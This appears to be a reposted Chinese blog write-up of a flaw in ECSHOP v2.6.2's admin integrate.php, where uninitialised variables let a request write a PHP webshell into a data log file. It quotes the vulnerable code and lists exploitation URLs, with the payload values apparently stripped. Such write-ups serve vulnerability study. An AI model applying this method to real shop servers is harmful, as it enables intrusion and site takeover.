客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
ECSHOP前段时间出了个注射漏洞:http://bbs.wolvez.org/topic/67/,拿后台权限应该没有问题,但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell,无聊中我baidu、google了下,网上貌似没有拿shell的办法。好久没读代码了,无聊中下了ECSHOP最新版(V2.6.2)的源码过来读,很庆幸,给我找到一个可以直接写shell的文件。与注射一样,同样是个变化未初始化导致的问题,于是,同样只能用在register_globals为on的环境下。 integrate.php第740行起: 复制代码 代码如下:if ($_REQUEST['act'] == 'sync') { $size = 100; ...... $tasks = array(); if ($task_del > 0) { $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'' . $_LANG['task_uncomplete'] . ''); $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2"; $del_list = $db->getCol($sql);//$del_list未初始化 } if ($task_rename > 0) { $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'' . $_LANG['task_uncomplete'] . ''); $sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3"; $rename_list = $db->getAll($sql);//$rename_list未初始化 } if ($task_ignore >0) { $sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4"; $ignore_list = $db->getCol($sql);//$ignore_list未初始化 } ...... /* 保存修改日志 */ $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb'); $log = ''; if (isset($del_list)) { $log .= '$del_list=' . var_export($del_list,true) . ';'; } if (isset($rename_list)) { $log .= '$rename_list=' . var_export($rename_list, true) . ';'; } if (isset($ignore_list)) { $log .= '$ignore_list=' . var_export($ignore_list, true) . ';'; } //未做过滤,直接写log fwrite($fp, $log); fclose($fp); $smarty->assign('tasks', $tasks); $smarty->assign('ur_here',$_LANG['user_sync']); $smarty->assign('size', $size); $smarty->display('integrates_sync.htm'); } $del_list、$rename_list、$ignore_list均没有初始化,于是,均可以直接写shell。 利用方法: http://www.oldjun.com/admin/integrate.php?act=sync&del_list= http://www.oldjun.com/admin/inte ... nc&rename_list= http://www.oldjun.com/admin/inte ... nc&ignore_list= 三个链接,随便输入一个就可以了,生成http://www.oldjun.com/data/integrate__log.php,就是一句话小马了~ |
请发表评论